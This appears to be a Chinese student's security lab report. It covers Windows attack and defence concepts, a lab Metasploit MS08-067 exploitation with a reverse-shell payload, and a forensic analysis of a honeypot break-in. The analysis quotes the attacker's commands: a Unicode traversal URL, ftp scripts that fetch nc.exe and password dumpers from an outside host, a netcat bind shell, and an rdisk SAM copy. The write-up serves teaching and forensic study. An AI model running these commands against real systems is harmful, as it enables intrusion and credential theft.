1.实验内容
(一)Windows操作系统基本模型
- 内核模式:内核代码运行在处理器特权模式(ring 0)
- 用户模式:应用程序代码运行在处理器非特权模式(ring 3)
(二)Windows远程安全攻防技术
目前Windows远程攻击技术有以下几类:远程口令猜解与破解攻击、攻击Windows网络服务、攻击Windows客户端和用户
- windows远程口令猜解攻击与破解攻击
(1)远程口令字猜测:
攻击渠道:SMB协议,其他包括WMI服务、TS远程桌面终端服务,mysql数据库服务、SharePoint。
工具:Legion、enum、smbgrind、NTScan、XScan、流光、NTScan汉化版。
原理:SMB服务决定授予网络用户对所请求的共享文件或打印机的访问权之前,会先进行身份验证,此时用户输入正确口令,攻击者对系统实施远程口令字猜测攻击。由于系统中存在大量弱口令,使得远程口令猜测成为可能。
(2)远程口令字交换通信窃听与破解:
攻击渠道:NTLM、LanMan、NTLMV2和kerberos网络认证协议的弱点。
工具:L0phtcrack、Cain and Abel
防范措施:尽量关闭不必要的易受攻击的网络服务、配置主机防火墙来限制某些端口服务、网络防火墙限制这些服务的访问、禁用过时且有安全缺陷的Lanman和NTLM、指定强口令策略。 - windows网络服务远程渗透攻击
类型: 针对NETBIOS服务、针对SMB服务、针对MSRPC服务、针对Windows系统上微软网络的远程渗透攻击、针对Windows系统上第三方服务的远程渗透攻击。
防范措施:从设计开发根源上减少安全漏洞的出现,及时进行漏洞补丁修护,尽可能快速更新与应用软件安全补丁;在安全漏洞从被意外公布和利用到补丁发布的这段“零日”漏洞时间中,管理员要尽快对安全敏感的服务器做测试和实施可用的攻击缓解配置;利用服务软件厂商及社区提供的安全核对清单来对服务进行安全配置,利用一些安全插件,利用漏洞扫描软件扫描漏洞及时进行修复。 - Metasploit渗透测试:
基础库文件:包括Rex,framework-core和framework-base三部分。
模块:辅助模块、渗透攻击模块(主动、被动)、攻击载荷模块(在渗透攻击成功后促使目标系统运行)、空指令模块、编码器模块、后渗透模块(获取敏感信息)。
(三)Windows系统本地安全攻防技术
- windows本地特权提升
…常见手段:溢出提权、windows错误系统配置、计划任务提权。
…防范措施:及时打补丁、及时跟进厂家的安全警告
- windows敏感信息窃取
…常见手段:windows系统口令字密文提取技术、windows系统口令字破解技术、用户敏感信息窃取等手段
…防范措施:使用安全度高、能抵挡破解的口令
- windows消灭踪迹
…常见手段:关闭审计功能、清理事件日志。
…防范措施:实现配置好系统审计和网络服务审计功能,并将日志传输到安全服务器中。
- 远程控制与后门
…主要手段:向受控主机中植入第三方的远程控制与后门程序,主要包含命令行远程控制程序和图形化远程控制程序。
…防范措施:采用一些后门检测软件来尝试发现攻击者隐藏的后门程序。
2.实验过程
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
本次实验使用了kali(192.168.200.6)和win2kserver(192.168.200.124)
首先打开kali输入命令行msfconsole进入启动msfconsole
输入search ms08_067查看漏洞信息
输入命令进入漏洞所在文件
输入show options查看攻击此漏洞需要的设置
输入命令show payloads显示此漏洞的载荷
通过使用 set payload generic/shell_reverse_tcp命令设置攻击的载荷为tcp反向连接,然后,输入set LHOST 192.168.200.2 、set RHOST 192.168.200.124
设置进行渗透攻击的主机为Kali,受到攻击的主机为Win2kServer
输入exploit,开始进行攻击
攻击成功后,就进入到了靶机的命令行界面,输入ipconfig/all查看靶机信息
在wireshark中抓包可见源地址192.168.200.6源端口号35917
目的地址192.168.200.124目的端口445,浏览抓包记录可知攻击利用的漏洞有:针对SMB网络服务的漏洞、DCERPC解析器拒绝服务漏洞、SPOOLSS打印服务假冒漏洞
查看wireshark抓包的TCP流可以看到靶机中输入的命令行被抓取
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1、攻击者使用了什么破解工具进行攻击
将文件下载后用wireshark打开,将过滤条件设置为:ip.addr==172.16.1.106 and http
开始观察,发现第117行出现一个字符 %C0%AF,查看TCP流
可以看到GET /guest/default.asp/…%C0%AF…/…%C0%AF…/…%C0%AF…/boot.ini HTTP/1.1,说明攻击机在 http://lab.wiretrip.net/guest/default.asp进行了 Unicode 编码攻击并打开了NT系统启动文件 boot.ini ,因为 %C0%AF 为 / 的Unicode编码。
随后观察到编号130,140,149中都有msadc,追踪149号数据包,攻击者通过 msadcs.dll 中存在的RDS漏洞进行了SQL注入攻击,并执行了命令cmd /c echo werd >> c:\fun ,根据特征字符串 ADM!ROX!YOUR!WORLD ,可以查询到是由msadc(2).pl渗透攻击工具发起的攻击。
2、攻击者如何使用这个破解工具进入并控制了系统
依次往下查看数据包,在第一个1778->80开始,追踪TCP流,发现指令为cmd /c echo user johna2k > ftpcom,
继续往下找,依次可以找到以下指令:
cmd /c echo hacker2000 > ftpcom
cmd /c echo get samdump.dll > ftpcom
cmd /c echo get pdump.exe > ftpcom
cmd /c echo get nc.exe > ftpcom
cmd /c echo quit >> ftpcom
cmd /c ftp -s:ftpcom -n www.nether.net
根据这些指令可知: 攻击者首先创建了一个ftpcom脚本,并使用ftp连接www.nether.net(给出了用户名密码),尝试下载samdump.dll、pdump.exe和nc.exe(攻击工具)
直接筛选ftp,可以看到最终在编号1106处攻击者成功连接了FTP服务器。
接下来就看编号1106之前攻击者所发出的指令,发现攻击者由RDS攻击改为使用Unicode漏洞攻击。
copy C:\winnt\system32\cmd.exe cmd1.exe
cmd1.exe /c open 213.116.251.162 >ftpcom
cmd1.exe /c echo johna2k >>ftpcom
cmd1.exe /c echo haxedj00 >>ftpcom
cmd1.exe /c echo get nc.exe >>ftpcom
cmd1.exe /c echo get pdump.exe >>ftpcom
cmd1.exe /c echo get samdump.dll >>ftpcom
cmd1.exe /c echo quit >>ftpcom
再向后观察到编号1224,攻击者执行了命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe 表示攻击者连接了6969端口,并且获得了访问权限。至此,攻击者完成了进入系统并且获得访问权的过程。
3、攻击者获得系统访问权限后做了什么
首先用tcp.port == 6969进行过滤,然后追踪TCP流来观察攻击者攻击行为。
可以看到攻击者尝试信息收集,使用net session(列出会话),但是没有权限,然后执行net users, 返回该主机的用户列表。
接着发了一个echo消息到C盘根目录文件README.NOW.Hax0r
接着尝试通过net group查看组用户、net localgroup查看本地组用户、以及 net group domain admins查看管理员组,但都失败了。
接下来,攻击者开始寻找msadc目录,发现他试着执行pdump来破解出Administrator口令密文,但是还是失败,于是攻击者删除了samdump和pdump。
接着,攻击者试着用rdisk获得SAM口令文件(安全账号管理器),rdisk是磁盘修复程序,执行rdisk /s-备份关键系统信息,在/repair目录中就会创建一个名为sam._的SAM压缩拷贝。并且攻击者把这个文件拷贝到har.txt并打印。
4、我们如何防止这样的攻击
…为这些漏洞打上补丁.
…禁用用不着的 RDS 等服务。
…防火墙封禁网络内部服务器发起的连接。
…为web server 在单独的文件卷上设置虚拟根目录。
…使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能。
…使用 IIS Lockdown 和 URLScan 等工具加强 web server
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
我觉得攻击者发现了他的目标是一台蜜罐主机,在数据包中我们可以发现这样一个包,说这是他迄今为止见到过最好的蜜罐
(3)团队对抗实践:windows系统远程渗透攻击和分析。
1、攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
攻击机(马丽 kali:192,168.239.160)
靶机(吴煦雯 win2kserver:192.168.239.100)
使用漏洞:ms08_67
连通性测试
在kali上按照之前实践(1)的步骤设置好攻击机和靶机后输入exploit进行攻击
攻击成功后进入靶机输入madir mary创建文件夹
在靶机相应文件里可以找到刚刚创建的文件夹
2、防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
使用wireshark捕包跟踪数据流可以看到输入的命令
3.学习中遇到的问题及解决
问题1:做实践(3)时不知道如何下手来使攻击机和靶机连通
- 问题1解决方案:首先将两个虚拟机的网络适配器调至桥接模式,之后在win2kserver虚拟机左下角开始中打开设置中的网络和拨号连接
双击本地连接,点击打开属性
双击打开Internet协议
勾选上自动获得IP地址和自动获得DNS服务器地址
4.实践总结
这次试验我对Windows操作系统安全体系结构与机制有了更深刻的认识,通过实践我也了解到了Windows安全攻防技术,在NT分析时查阅了很多资料也学习到了很多漏洞攻击技术。
1706
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
